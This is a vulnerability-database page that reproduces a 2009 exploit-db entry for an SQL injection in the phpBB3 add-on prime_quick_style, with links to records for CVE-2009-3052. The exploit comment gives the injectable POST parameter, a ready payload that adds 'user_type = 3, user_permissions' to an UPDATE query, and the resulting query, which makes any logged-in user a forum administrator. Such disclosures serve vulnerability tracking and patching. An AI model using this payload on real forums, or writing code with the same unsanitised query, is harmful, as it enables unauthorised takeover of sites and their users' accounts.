Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdb-SmoG-EDB-ID:9569
HistorySep 01, 2009 - 12:00 a.m.

phpBB3 - addon prime_quick_style GetAdmin

2009-09-0100:00:00
-SmoG-
www.exploit-db.com
46

AI Score

7.4

Confidence

Low

JSON
##########################################################################
#
#	phpBB3 addon prime_quick_style GetAdmin Exploit
#
#	Vulnerability found and exploited by -SmoG-
#
#	target file: prime_quick_style.php
#
#
#   vuln: POST parameter "prime_quick_style" is injectable.
#   source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
#	HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
#	example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
#  
#	query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
#	gratz, now u will be an admin  :) 
#
#	--- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
#														-( by -SmoG- )-
##########################################################################

# milw0rm.com [2009-09-01]

Related

prion 1
nvd 1
cvelist 1
cve 1
prion
prion
Sql injection
2009-09-03 17:30:00
nvd
nvd
CVE-2009-3052
2009-09-03 17:30:08
cvelist
cvelist
CVE-2009-3052
2009-09-03 17:00:00
cve
cve
CVE-2009-3052
2009-09-03 17:30:08

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:9569
prion1nvd1cvelist1cve1